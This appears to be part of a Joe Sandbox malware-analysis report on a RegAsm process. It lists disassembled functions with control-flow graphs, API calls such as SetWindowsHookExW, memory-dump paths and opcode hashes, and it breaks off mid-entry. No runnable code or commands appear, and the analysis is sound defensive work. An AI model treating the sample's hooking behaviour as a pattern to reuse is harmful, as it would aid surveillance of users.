                                                                                                • Opcode Fuzzy Hash: 985086303a85b1e4c6ed90769354ce1d7fe40de40f485461bcb28197b902b0ba
                                                                                                • Instruction Fuzzy Hash: 0141AEB2300521CBC3499B19CA4562EF7B3BB856057398648E0029B761CF3BEC53DB85
                                                                                                Function 031A8B7C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 595 31a8b7c-31a90e4 DuplicateHandle 597 31a90ed-31a910a 595->597 598 31a90e6-31a90ec 595->598 598->597
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031A9016,?,?,?,?,?), ref: 031A90D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 2660cf301569fe53d09433f8f4f5c5f0bf66b724530ccc75c7c1535f94a2cf13
                                                                                                • Instruction ID: b199401f5dfdfa4e22f5c9dcc1ae080b203f1675e274480535bfc11ef3632adc
                                                                                                • Opcode Fuzzy Hash: 2660cf301569fe53d09433f8f4f5c5f0bf66b724530ccc75c7c1535f94a2cf13
                                                                                                • Instruction Fuzzy Hash: 7021F4B5900248EFDB10CFAAD584BDEBBF8EB48210F14841AE914A7350D374A944CFA4
                                                                                                Function 031A9048 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 601 31a9048-31a904e 602 31a9050-31a90e4 DuplicateHandle 601->602 603 31a90ed-31a910a 602->603 604 31a90e6-31a90ec 602->604 604->603
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031A9016,?,?,?,?,?), ref: 031A90D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: b43327a3f9c4668eccfd2bdf88c08cbebadbac8dec286b99ebc27a882e068541
                                                                                                • Instruction ID: f86ba7f19cb7d01a6fb966fb76a0829dbb673d2e7a2fcc0a57ea6432653743fb
                                                                                                • Opcode Fuzzy Hash: b43327a3f9c4668eccfd2bdf88c08cbebadbac8dec286b99ebc27a882e068541
                                                                                                • Instruction Fuzzy Hash: 4F21E3B5D00248EFDB10CFAAD984ADEFBF9EB48310F14841AE914A7350D379A954CFA5
                                                                                                Function 031A3CF0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 615 31a3cf0-31a3d42 618 31a3d4e-31a3d80 SetWindowsHookExW 615->618 619 31a3d44 615->619 620 31a3d89-31a3dae 618->620 621 31a3d82-31a3d88 618->621 622 31a3d4c 619->622 621->620 622->618
                                                                                                APIs
                                                                                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 031A3D73
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: HookWindows
                                                                                                • String ID:
                                                                                                • API String ID: 2559412058-0
                                                                                                • Opcode ID: 332b6a769612de10026bfc3f229e80fa0d157c58accfa6292b217f78510c2a3e
                                                                                                • Instruction ID: f35cac04c433603e088c583c9851e68af729ec3c6e09567e85d7bb5a11eb0e1f
                                                                                                • Opcode Fuzzy Hash: 332b6a769612de10026bfc3f229e80fa0d157c58accfa6292b217f78510c2a3e
                                                                                                • Instruction Fuzzy Hash: 70212579D00648DFDB14DFAAC844BDEFBF5EB88310F14882AD428A7250CB75A940CFA5
                                                                                                Function 031A3CF8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 626 31a3cf8-31a3d42 628 31a3d4e-31a3d80 SetWindowsHookExW 626->628 629 31a3d44 626->629 630 31a3d89-31a3dae 628->630 631 31a3d82-31a3d88 628->631 632 31a3d4c 629->632 631->630 632->628
                                                                                                APIs
                                                                                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 031A3D73
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: HookWindows
                                                                                                • String ID:
                                                                                                • API String ID: 2559412058-0
                                                                                                • Opcode ID: b0a959717a8db385c00a483e6d8a43ca6774392683cd5d85d290e6806c22274b
                                                                                                • Instruction ID: edd68ab195e3762faf5647f0320f4cc24aec78d49d3d836fe0c42030abc072fe
                                                                                                • Opcode Fuzzy Hash: b0a959717a8db385c00a483e6d8a43ca6774392683cd5d85d290e6806c22274b
                                                                                                • Instruction Fuzzy Hash: E1212779D00648DFDB14DFAAC844BEEFBF5EB88310F14881AD419A7250CB75A944CFA5
                                                                                                Function 07022ED8 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 756 7022ed8-7022f08 759 7022f0a-7022f12 756->759 760 7022f3e-7022f58 756->760 761 7022f20-7022f2f 759->761 762 7022f14-7022f16 759->762 767 7022f5a-7022f62 760->767 768 7022f8e-7022fd8 760->768 766 7022f34-7022f3b 761->766 762->761 769 7022f70-7022f8b 767->769 770 7022f64-7022f66 767->770 768->770 778 7022fda-7023022 768->778 770->769 781 7023024-7023027 778->781 782 7023029 778->782 783 702302b-7023096 781->783 782->783 792 70230a6 783->792 793 7023098-70230a4 783->793 794 70230a8-70230ac 792->794 793->794 796 70230ae-70230ba 794->796 797 70230bc 794->797 798 70230be-70230df 796->798 797->798
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'q
                                                                                                • API String ID: 0-1807707664
                                                                                                • Opcode ID: d591029f2ab4fb5dd702f6749c849a501cc314fcc330dc6799d8a27c50d74de3
                                                                                                • Instruction ID: a8a227cb16437ceac3c37749da3fc2d8ce68da445f0f5bc76517fe2785e8c2bb
                                                                                                • Opcode Fuzzy Hash: d591029f2ab4fb5dd702f6749c849a501cc314fcc330dc6799d8a27c50d74de3
                                                                                                • Instruction Fuzzy Hash: 2951B171B002158FCB54DBADD850AAEFBF6EFC9210B14816AE905EB354DE34DC0287A1
                                                                                                Function 07026800 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: ea7a7bc6bd67ff7befe17fec2aeb2d636440476995cf4d397d97f3fb8184035e
                                                                                                • Instruction ID: 3ee04f0b8f20666bad2fef8aae8aede876c06fd0938689049399c7e1f4981f86
                                                                                                • Opcode Fuzzy Hash: ea7a7bc6bd67ff7befe17fec2aeb2d636440476995cf4d397d97f3fb8184035e
                                                                                                • Instruction Fuzzy Hash: 0551AD71A00211DFE724CF29D944B69BBF6FF48720F214299E5119B7A0CB76EC41CB90
                                                                                                Function 07025FE9 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $q
                                                                                                • API String ID: 0-1301096350
                                                                                                • Opcode ID: 4dca01727b2e5b4b36ffff47735fc4a5e4106d5a8cb270ab42c74a610240ba85
                                                                                                • Instruction ID: eaddc14a02951eab1c841b421769e21b41e7fb25ba139ae2801c8f97f372bc96
                                                                                                • Opcode Fuzzy Hash: 4dca01727b2e5b4b36ffff47735fc4a5e4106d5a8cb270ab42c74a610240ba85
                                                                                                • Instruction Fuzzy Hash: 0941C1B2304511CBC30A9B18860552DBBB3BF8560573D8689E0429B752CB3BEC53DB85
                                                                                                Function 07027345 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 107ddb2d5bffc9997cab450068d3c961a5e83a51482ca29e397ca0d2dad37b06
                                                                                                • Instruction ID: efc5199f5ce385dfcafd55f10abfff68f228c0fbac6509b2c1fe7d4a5b5dbb31
                                                                                                • Opcode Fuzzy Hash: 107ddb2d5bffc9997cab450068d3c961a5e83a51482ca29e397ca0d2dad37b06
                                                                                                • Instruction Fuzzy Hash: 9F31E8B1B102159FD7149B69C455BEE7EF7AF88710F284059E501EB390CFB48C02DB91
                                                                                                Function 07025F08 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 968b61a7493bb23e1e89dd730474fb9ad5af122d20429c079997ad3180e0b26f
                                                                                                • Instruction ID: 8ec288b4eb0603b83ce902fdd49a11bcc89028a92578caf717065c473fb658c2
                                                                                                • Opcode Fuzzy Hash: 968b61a7493bb23e1e89dd730474fb9ad5af122d20429c079997ad3180e0b26f
                                                                                                • Instruction Fuzzy Hash: 5721AE717101248FCB84DB68C959BAD77F6AF8C710F2841AAE502EB3A0CF708C029B51
                                                                                                Function 07025F18 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 1abfb3efd47fe53683d17b244078bc3ee4f05ccb9687b13f3eaa9258a2017de6
                                                                                                • Instruction ID: 169b2875da99ba3a6b29abaa3008c3a62d8870713ee3df8d3e2802f8c2ca617a
                                                                                                • Opcode Fuzzy Hash: 1abfb3efd47fe53683d17b244078bc3ee4f05ccb9687b13f3eaa9258a2017de6
                                                                                                • Instruction Fuzzy Hash: DF2190717101248FDB94DB68C958B6E77FAAF88711F2542AAF502DB3A0CF708C019B95
                                                                                                Function 07027297 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 0c6bc7b641c48fc9d516a22c024940f64fae8c8141d090596f19aafd1fc29e2f
                                                                                                • Instruction ID: 9fdb0d1db0ab5bd5eedafb26cab7bf3db89234da6da01e05216551828de3a3f6
                                                                                                • Opcode Fuzzy Hash: 0c6bc7b641c48fc9d516a22c024940f64fae8c8141d090596f19aafd1fc29e2f
                                                                                                • Instruction Fuzzy Hash: D02127B1714215DFDB14CF58C919BAE7BF6AF48714F140559E602EB391CB744C06DB90
                                                                                                Function 070266E8 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 612a2907e5d25d748d1d02390329f319b5879caf5886c59097cd3ee57cee1acf
                                                                                                • Instruction ID: 85e0c06741adc2d3969a8d0aa1b748b324e7e26ea22069445da77835f06ca772
                                                                                                • Opcode Fuzzy Hash: 612a2907e5d25d748d1d02390329f319b5879caf5886c59097cd3ee57cee1acf
                                                                                                • Instruction Fuzzy Hash: 9D118171B102049FDB14EF69C898FAEBBE6EF88714F144059E901EB7A1CA719C01DB90
                                                                                                Function 07024C18 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $q
                                                                                                • API String ID: 0-1301096350
                                                                                                • Opcode ID: 402dd73de13e8ecef1c9cc23ebfce632f6eb05c7e6d967d0d048c6128d4b7ea5
                                                                                                • Instruction ID: 88997cd1616dae391f8668814e034d4232cd7806efaf15d22ac3407f96f922f3
                                                                                                • Opcode Fuzzy Hash: 402dd73de13e8ecef1c9cc23ebfce632f6eb05c7e6d967d0d048c6128d4b7ea5
                                                                                                • Instruction Fuzzy Hash: 47119EB27002155BE768DA6ED804A6AB79BEFC4650724813AF604CF274DA31DC4287A4
                                                                                                Function 070272A8 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: ba974c1953f72caa58cdf8de1dd789d77b98b51b853121d44ff9c4ae131d4cc7
                                                                                                • Instruction ID: 4e9ba32a7ff75588c6d057db6584c24caa9274b813d91e59224cb8dac50e55e0
                                                                                                • Opcode Fuzzy Hash: ba974c1953f72caa58cdf8de1dd789d77b98b51b853121d44ff9c4ae131d4cc7
                                                                                                • Instruction Fuzzy Hash: 850180717101149FDB149B59C959B6E7BF6AF8C710F250069F502EB3A1CF719D02CB91
                                                                                                Function 07024C09 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $q
                                                                                                • API String ID: 0-1301096350
                                                                                                • Opcode ID: 50f049af4e886d0255444d6d1ad932da52b7a02b3f86e14079b8c7fbc88fb1c7
                                                                                                • Instruction ID: df15c3601addbdc17f02d0ce6a62dac1b70929943705e9eafa2578612bbe4127
                                                                                                • Opcode Fuzzy Hash: 50f049af4e886d0255444d6d1ad932da52b7a02b3f86e14079b8c7fbc88fb1c7
                                                                                                • Instruction Fuzzy Hash: 7A01F9717013671BE3659A3E8804A6B7B9FAFC56407144169F105CF275DE30DC0243E4
                                                                                                Function 07022880 Relevance: .5, Instructions: 467COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf6bf3bf617204f4291c1fe5b45ce579718b610dbe21967c725ee1ee6a7b7af3
                                                                                                • Instruction ID: 3658200b503be128ded4b4a4f71be06ffa9a0e6de12f6156a5da9a91110736af
                                                                                                • Opcode Fuzzy Hash: bf6bf3bf617204f4291c1fe5b45ce579718b610dbe21967c725ee1ee6a7b7af3
                                                                                                • Instruction Fuzzy Hash: 0DF1D0717002159FDB55DFA8D854AAEBBB6FF89310F14816AE906CB351CB31EC06CBA1
                                                                                                Function 07026EE0 Relevance: .2, Instructions: 248COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 16ff0215e8214991dcb8226a20c099fa4ac2d4209511bf488f676878151cccf0
                                                                                                • Instruction ID: 55594a058d6478f11b17c2a84b953204e0261fe9e1652113be24cf95f2badd5a
                                                                                                • Opcode Fuzzy Hash: 16ff0215e8214991dcb8226a20c099fa4ac2d4209511bf488f676878151cccf0
                                                                                                • Instruction Fuzzy Hash: CB91DF74B007118FDB58EF78D89466D77E2EF89250F208669E9068B345EF35DC06CB92
                                                                                                Function 07022178 Relevance: .2, Instructions: 227COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ebafd4afa00d7427aa8c44daaf9b2fee18dec9c15f17e9803b48d7440bb9886a
                                                                                                • Instruction ID: 591c925e90b14bccaad72cf5b0e4674f21f0cd443e2fab1f69e7f721416a6be1
                                                                                                • Opcode Fuzzy Hash: ebafd4afa00d7427aa8c44daaf9b2fee18dec9c15f17e9803b48d7440bb9886a
                                                                                                • Instruction Fuzzy Hash: 4F81AE76B002168FDB14DFA8E450BAEB7B2FB88300F15852AE901D7384CB35DD52DB91
                                                                                                Function 07026B28 Relevance: .2, Instructions: 213COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f42c1cd8d3846ce6d6a5ff3e0727dec47bb618358d41b626f78729c0c04ddd5b
                                                                                                • Instruction ID: 09b210f45328f91411c9baa4133a44c6860cf133238f09cefc23d502ddb39af2
                                                                                                • Opcode Fuzzy Hash: f42c1cd8d3846ce6d6a5ff3e0727dec47bb618358d41b626f78729c0c04ddd5b
                                                                                                • Instruction Fuzzy Hash: ED919FB1A04211CFDB58EF28E80879977B3F78E358F54431AC8008B798E7769886DF61
                                                                                                Function 07025C38 Relevance: .1, Instructions: 108COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fdc06b902b15eb711fe9b16c628734c08c9b8a5655d5dfea9b53f0d56f5dd2b4
                                                                                                • Instruction ID: 8e88aa36774fb9defd3b2fee216ca97e9045f5b88d3b792a59dcfbe050d54d86
                                                                                                • Opcode Fuzzy Hash: fdc06b902b15eb711fe9b16c628734c08c9b8a5655d5dfea9b53f0d56f5dd2b4
                                                                                                • Instruction Fuzzy Hash: 104124B6D01218EFDB24CFA9D944BDEBBF5EF48300F20816AE415AB250DB309946CF54
                                                                                                Function 070261C0 Relevance: .1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f080959f0e57d42a2e9d6d283657d37dee12503dd84eb945de2a2f4bb0781f7c
                                                                                                • Instruction ID: ac5b14ed375ad722185256bb134aab0ce2af847da517f589dbf8f4272e8de88b
                                                                                                • Opcode Fuzzy Hash: f080959f0e57d42a2e9d6d283657d37dee12503dd84eb945de2a2f4bb0781f7c
                                                                                                • Instruction Fuzzy Hash: 56418E75A00615CFCB04DFA8C584E6AFBB2FF44305F1181A5E851AB7A6C735EC42CB91
                                                                                                Function 07025C2C Relevance: .1, Instructions: 98COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 238e82894deede97b048ccbe8f6bece6eace7dbd09d48c0549a3a2e372da9162
                                                                                                • Instruction ID: 2e3bf558d4455f210d3eb888992f93e253a64dd9e175c30e032adf4fdf33564a
                                                                                                • Opcode Fuzzy Hash: 238e82894deede97b048ccbe8f6bece6eace7dbd09d48c0549a3a2e372da9162
                                                                                                • Instruction Fuzzy Hash: 874125B5D01218EFDB24CFA9C984BDEBBF5EF48304F20816AE415AB250DB705946CF54
                                                                                                Function 07026ECF Relevance: .1, Instructions: 84COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5e063bacc6619e5fe9f604fd876104333cd7a3b24f97d5500b03393f673f4741
                                                                                                • Instruction ID: f55141e6bbc87dfb9d43e18d490e210c3df4cab93bd6e00d0c5db661d99c0ba2
                                                                                                • Opcode Fuzzy Hash: 5e063bacc6619e5fe9f604fd876104333cd7a3b24f97d5500b03393f673f4741
                                                                                                • Instruction Fuzzy Hash: 562137353013204BDB64AB38D8A56BE3BD7DB88244B108629DA06C7349FF35CC0787E6
                                                                                                Function 0188D2CC Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: df4e6b0150ead07df380c603607deb0c23aff6d7cfd3c2e14a52589616784fa7
                                                                                                • Instruction ID: c1f741449e589bd339ed7ab36990a0e68c9990de0b1b48e8d20b8034bff9b9bb
                                                                                                • Opcode Fuzzy Hash: df4e6b0150ead07df380c603607deb0c23aff6d7cfd3c2e14a52589616784fa7
                                                                                                • Instruction Fuzzy Hash: 2B2129B1504344EFDB15EF54D5C0B26BB65FB84328F24CA6DD8098F282D335D546CB62
                                                                                                Function 0188D47C Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05f5aa96d367c0383d379f22bb42b3cdc94d56ee189c39a77dbee7e9b25b5c85
                                                                                                • Instruction ID: 03338cb26ac658ff173734f7a2c830255572d42cc3b6fb4891ce0c08563c32b9
                                                                                                • Opcode Fuzzy Hash: 05f5aa96d367c0383d379f22bb42b3cdc94d56ee189c39a77dbee7e9b25b5c85
                                                                                                • Instruction Fuzzy Hash: 7B213471500204EFDB15EF58D9C0B26BB61FB84318F24C6AEE8098F296C336D946CA62
                                                                                                Function 0188D0FC Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1adf1c86c6d0daaa9c3ee297e1975aa01e9b8ba88fe69a99957149df0c3af381
                                                                                                • Instruction ID: b67a9eb3f4e113fe222be4425ea94aafb44e67d3de0466e7d238f4dfe27fcd06
                                                                                                • Opcode Fuzzy Hash: 1adf1c86c6d0daaa9c3ee297e1975aa01e9b8ba88fe69a99957149df0c3af381
                                                                                                • Instruction Fuzzy Hash: E4212579500604EFDB15EF54D9C0B26FB61EF84318F20C66DD8098F292C336D946CA61
                                                                                                Function 070261B0 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab0719334e946a70301f6dec6008b92d289ee0bc03b4ea3c5a81b6d84f2c0cec
                                                                                                • Instruction ID: 158290f0f98efb035588d48ef8944a5ce1d6ae950cd6aa42f0c33c46d11ffa7d
